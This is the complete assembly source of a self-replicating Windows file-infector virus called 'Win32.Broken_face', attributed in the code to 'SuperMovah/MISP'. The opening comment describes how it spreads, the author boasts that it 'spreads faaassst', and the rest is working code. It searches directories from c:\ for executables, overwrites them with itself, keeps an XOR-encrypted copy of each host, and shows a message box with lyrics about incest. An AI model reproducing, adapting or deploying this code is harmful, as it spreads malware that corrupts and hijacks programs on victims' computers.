Win32.Broken_face - Virus Source Code

1. ;                           ___________________
2. ;                          | Win32.Broken_face |
3. ;                          | __________________|
4. ;               ___________||
5. ;[ Information ]
6. ;First, virus moves to the root directory, and scans for
7. ;directorys.It enters them and checks for executables.If
8. ;no files found or more files needed, then looks  in the
9. ;current directory for another subdir. If there isnt any
10. ;it goes back and enters  another dir etc  etc. Encrypts
11. ;hostfiles ( marked with _ in front of  their name ) and
12. ;when its time to execute a host, it decrypts it  into a
13. ;file marked with $, executes it, and keeps  deleting it
14. ;until  the file exits so the decrypted file dissapears.
15. ;Sick method, could not  think of  anything else, but it
16. ;works  fine. Infected  hosts keep  the original size if
17. ;they are smaller than 8192 bytes.Thats all. Be carefull
18. ;if you think of experimenting with it,spreads faaassst.
19.  
20. .386
21. .model flat
22. .data
23. fuck dd 0
24. shit dd 0
25. ftel dd ?
26. tdata db 318 dup (?)
27. target dd ?
28. Nbytes dd 0
29. newhandle dd ?
30. depth db 0
31. filehandle db 40 dup (?)
32. find_data db 3180 dup (?)
33. xdata db 318 dup (?)
34. files2eat db 0eh  
35. xhandle dd 0
36. msg db "There was this boy",0dh,"who had two chlidren",0dh
37. db "with his sisters",0dh,"They were his daughters",0dh
38. db "They were his favourite lovers",0dh,"I got no lips,I got no tounge"
39. db 0dh,"Where there were eyes there's only space",0dh
40. db "I got no lips, I got no tounge",0dh,"I GOT A BROKEN FACE!",0
41. .code
42. extrn ExitProcess:proc
43. extrn MessageBoxA:proc
44. extrn FindFirstFileA:proc
45. extrn FindNextFileA:proc
46. extrn SetCurrentDirectoryA:proc
47. extrn DeleteFileA:proc
48. extrn FindClose:proc
49. extrn CreateFileA:proc
50. extrn GetCurrentDirectoryA:proc
51. extrn ReadFile:proc
52. extrn WriteFile:proc
53. extrn CloseHandle:proc
54. extrn WinExec:proc
55. extrn GetCommandLineA:proc
56. extrn CreateProcessA:proc
57.  
58. start:
59. sub esp,1024
60. mov ebp,esp
61. call GetCommandLineA
62. inc eax
63. mov [ftel],eax
64. laos:
65. cmp byte ptr [eax],'"'
66. je monday
67. inc eax
68. jmp laos
69. monday:
70. mov byte ptr [eax],0
71. mov dword ptr [fuck],eax
72. push offset root
73. call SetCurrentDirectoryA
74. xor esi,esi    ;for find_data
75. xor edi,edi    ;for filehandle
76.  
77. find1stdir:
78. lea eax,[find_data+esi]
79. push eax
80. push offset dirmasker
81. call FindFirstFileA
82. mov dword ptr [filehandle+edi],eax
83. cmp dword ptr [find_data+esi],10h ;check if it is a dir
84. jne find2nddir
85. cmp byte ptr [find_data+esi+44],"."
86. je find2nddir
87. getin:
88. lea eax,[find_data+44+esi]
89. push eax
90. call SetCurrentDirectoryA
91. inc byte ptr [depth]
92. push offset xdata
93. push offset exefile
94. call FindFirstFileA
95. cmp eax,-1
96. jnz fne1
97.  
98. dam:
99. add edi,4
100. add esi,313
101. jmp find1stdir
102. fne1:
103. mov bh,byte ptr [xdata+43]
104. mov [xhandle],eax
105. jmp infect
106. fne2:
107. mov byte ptr [xdata+43],bh
108. push offset xdata
109. mov eax,[xhandle]
110. push eax
111. call FindNextFileA
112. or eax,eax
113. jz dam
114.  
115. infect:
116. cmp byte ptr [xdata+44],'_'
117. je fne2
118.  
119. mov bh,byte ptr [xdata+43]
120. mov byte ptr [xdata+43],'_'
121. push offset tdata
122. push offset xdata+43
123. call FindFirstFileA
124. cmp eax,-1
125. jnz fne2
126.  
127. dmf:
128. xor edx,edx
129. push edx
130. push 2                      
131. push 1                      
132. push edx                    
133. push edx                    
134. push 40000000h              
135. push offset xdata+43
136. call CreateFileA
137. cmp eax,-1    
138. je end         ; failed. back in the box :(
139. mov [newhandle],eax
140.  
141. xor edx,edx
142. push edx
143. push edx
144. push 3
145. push edx
146. push edx
147. push 80000000h
148. push offset xdata+44
149. call CreateFileA
150. mov [target],eax
151. mov byte ptr [shit],66
152. call copyfile
153. call ftopen
154. xor edx,edx
155. push edx
156. push 80
157. push 3
158. push edx
159. push edx
160. push 40000000h
161. push offset xdata+44
162. call CreateFileA
163. mov [newhandle], eax
164. call copyfile
165. jmp end
166. getback:
167. cmp byte ptr [depth],0
168. je realend
169. dec byte ptr [depth]
170. push dword ptr [edi+filehandle]
171. call FindClose
172. sub esi,313
173. sub edi,4
174. push offset cdback
175. call SetCurrentDirectoryA
176. jmp find2nddir
177.  
178. goroot:
179. xor esi,esi
180. mov edi,esi
181. mov byte ptr [depth],0
182. push offset root
183. call SetCurrentDirectoryA ;move to c:\
184.  
185. find2nddir:
186. lea eax,[find_data+esi]
187. push eax
188. push dword ptr [filehandle+edi]
189. call FindNextFileA
190. or eax,eax
191. jz getback
192. cmp dword ptr [find_data+esi],10h
193. jne find2nddir
194. cmp byte ptr [find_data+esi+44],'.'
195. je find2nddir
196. jmp getin
197.  
198. end:
199. dec byte ptr [files2eat]
200. cmp byte ptr [files2eat],0
201. jne fne2
202. realend:
203. call dencrypt
204.  
205. push 5
206. push dword ptr [ftel]
207. call WinExec
208.  
209. cmp eax,31
210. jg fuckup
211.  
212. push 0
213. push offset tag+1
214. push offset msg
215. push 0
216. call MessageBoxA
217. jmp deadend
218. fuckup:
219. push dword ptr [ftel]
220. call DeleteFileA
221. or eax,eax
222. jz fuckup
223.  
224. deadend:
225. push 0
226. call ExitProcess
227.  
228. exefile db '*.exe',0
229. dirmasker db '*.',0
230. root db 'c:\',0
231. cdback db '..',0
232. tag db '[Broken_face',0,'coded by SuperMovah/MISP]'
233.  
234. copyfile:
235. push 0
236. push offset Nbytes
237. push 1024
238. push ebp
239. mov eax,[target]
240. push eax
241. call ReadFile
242. mov eax,[Nbytes]
243. or eax,eax
244. jz gbgb
245.  
246. cmp byte ptr [shit],66
247. je enchost
248.  
249. bck:
250. push 0
251. push offset Nbytes
252. push [Nbytes]
253. push ebp
254. mov eax,[newhandle]
255. push eax
256. call WriteFile
257. jmp copyfile
258.  
259. gbgb:
260. push dword ptr [newhandle]
261. call CloseHandle
262. push dword ptr [target]
263. call CloseHandle
264. mov byte ptr [shit],0
265. ret
266.  
267. enchost:
268. push esi
269. mov esi,ebp
270. mov ecx,100h
271. xor bx,bx
272. ench:
273. add bx,cx
274. xor word ptr [esi],bx
275. inc esi
276. inc esi
277. loop ench
278. pop esi
279.  
280. mov byte ptr [shit],66
281. jmp bck
282.  
283. dencrypt:
284. mov esi,dword ptr [fuck]
285. Tuesday:
286. cmp byte ptr [esi],'\'
287. je google
288. dec esi
289. loop Tuesday
290. google:
291. inc esi
292. mov al,byte ptr [esi]
293. mov byte ptr [esi],'_'
294.  
295. Friday:
296. inc esi
297. mov bl,byte ptr [esi]
298. mov byte ptr [esi],al
299. cmp byte ptr [esi],0
300. jz Sunday
301. inc esi
302. mov al,byte ptr [esi]
303. mov byte ptr [esi],bl
304. cmp byte ptr [esi],0
305. jnz Friday
306. Sunday:
307. call ftopen
308.  
309. mov esi, dword ptr [ftel]
310. ghho:
311. inc esi
312. cmp byte ptr [esi],'_'
313. jne ghho
314. mov byte ptr [esi],'$'
315. xor edx,edx
316. push edx
317. push 2
318. push 1
319. push edx
320. push 1
321. push 40000000h
322. push dword ptr [ftel]
323. call CreateFileA
324. mov [newhandle], eax
325. mov byte ptr [shit],66
326. call copyfile
327. ret
328.  
329. ftopen:
330. xor edx,edx
331. push edx
332. push edx
333. push 3
334. push edx
335. push 1
336. push 80000000h
337. push dword ptr [ftel]
338. call CreateFileA
339. mov [target],eax
340. ret
341. end start
342. ;2-9-2004